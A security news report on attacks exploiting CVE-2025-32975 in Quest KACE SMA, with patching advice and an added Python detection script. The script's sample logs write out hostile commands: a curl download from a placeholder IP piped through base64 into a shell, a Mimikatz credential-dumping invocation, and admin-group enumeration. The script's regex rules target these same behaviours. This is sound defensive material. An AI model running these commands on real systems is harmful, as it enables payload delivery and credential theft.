
Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems

Threat actors are exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA), enabling them to impersonate users and potentially take over administrative accounts.

What happened

Threat actors are suspected to be exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA). Arctic Wolf observed malicious activity starting the week of March 9, 2026, in environments with unpatched SMA systems exposed to the internet, consistent with the exploitation of CVE-2025-32975.

CVE-2025-32975 (CVSS score: 10.0) refers to an authentication bypass vulnerability that allows attackers to impersonate legitimate users without valid credentials. Successful exploitation of this flaw could facilitate the complete takeover of administrative accounts. The issue was patched by Quest in May 2025.

In the malicious activity detected by Arctic Wolf, threat actors are believed to have weaponized this vulnerability to seize control of administrative accounts and execute remote commands to drop Base64-encoded payloads from an external server via the curl command.

Key actions taken by the threat actors include:

  • Conducting credential harvesting using Mimikatz.
  • Running discovery and reconnaissance commands to enumerate logged-in users and administrator accounts.
  • Obtaining RDP access to backup infrastructure and domain controllers.

Why it matters

This incident underscores the importance of promptly applying patches and securing endpoint management systems, since a breach of such a system can have significant operational impact.

  • Administrators are advised to apply the latest updates for the KACE SMA and avoid exposing these instances to the internet.
  • Regularly audit and monitor systems for any unusual activity and ensure endpoint management practices are robust.
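As an added example of the monitoring this advice calls for (not code from the report or from Quest), the script below runs a handful of narrow rules over constructed process-creation records and flags the behaviours described above: a curl download followed by a Base64 decode on the same host, Mimikatz, user and admin enumeration, and RDP client launches. The log format, hosts, IP address and command lines are all invented for illustration.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed process-creation records in a hypothetical "host|parent|command line" format.
# Hosts, the IP (198.51.100.7, a documentation address) and command lines are invented.
SAMPLE_LOG = """\
kace-sma01|sh|curl -s http://198.51.100.7/stage.b64 -o /tmp/stage.b64
kace-sma01|sh|base64 -d /tmp/stage.b64 | sh
kace-sma01|sh|ls -la /var/log
WS-FIN-12|cmd.exe|mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
WS-FIN-12|cmd.exe|query user
WS-FIN-12|cmd.exe|net group "Domain Admins" /domain
WS-FIN-12|explorer.exe|mstsc.exe /v:BACKUP-SRV01
WS-FIN-12|cmd.exe|ipconfig /all
"""

# One rule per behaviour named in the report; patterns are kept narrow to limit noise.
RULES = [
    ("curl_download", re.compile(r"\bcurl\b.*\bhttps?://", re.I)),
    ("base64_decode", re.compile(r"\bbase64\b.*(-d|--decode)\b", re.I)),
    ("mimikatz", re.compile(r"mimikatz|sekurlsa::", re.I)),
    ("user_enum", re.compile(r"\bquery user\b|\bnet (user|group)\b|\bwhoami\b|\bqwinsta\b", re.I)),
    ("rdp_client", re.compile(r"\bmstsc(\.exe)?\b", re.I)),
]

def scan(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (record, rule) match, plus a correlated 'staged_payload'
    finding when a host base64-decodes after an earlier curl download in the stream."""
    findings: List[Dict[str, str]] = []
    seen_curl: Dict[str, bool] = defaultdict(bool)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        host, _parent, cmd = raw.split("|", 2)
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append({"host": host, "rule": name, "cmd": cmd})
                if name == "curl_download":
                    seen_curl[host] = True
                elif name == "base64_decode" and seen_curl[host]:
                    findings.append({"host": host, "rule": "staged_payload", "cmd": cmd})
    return findings

def hosts_with(findings: List[Dict[str, str]], rule: str) -> List[str]:
    """Distinct hosts that triggered a given rule, sorted for stable reporting."""
    return sorted({f["host"] for f in findings if f["rule"] == rule})

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']:<12} {f['rule']:<16} {f['cmd']}")
```

The correlated staged_payload rule is the one worth alerting on first, since a lone curl or base64 call is common on a management appliance while the pair in sequence matches the reported tradecraft.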
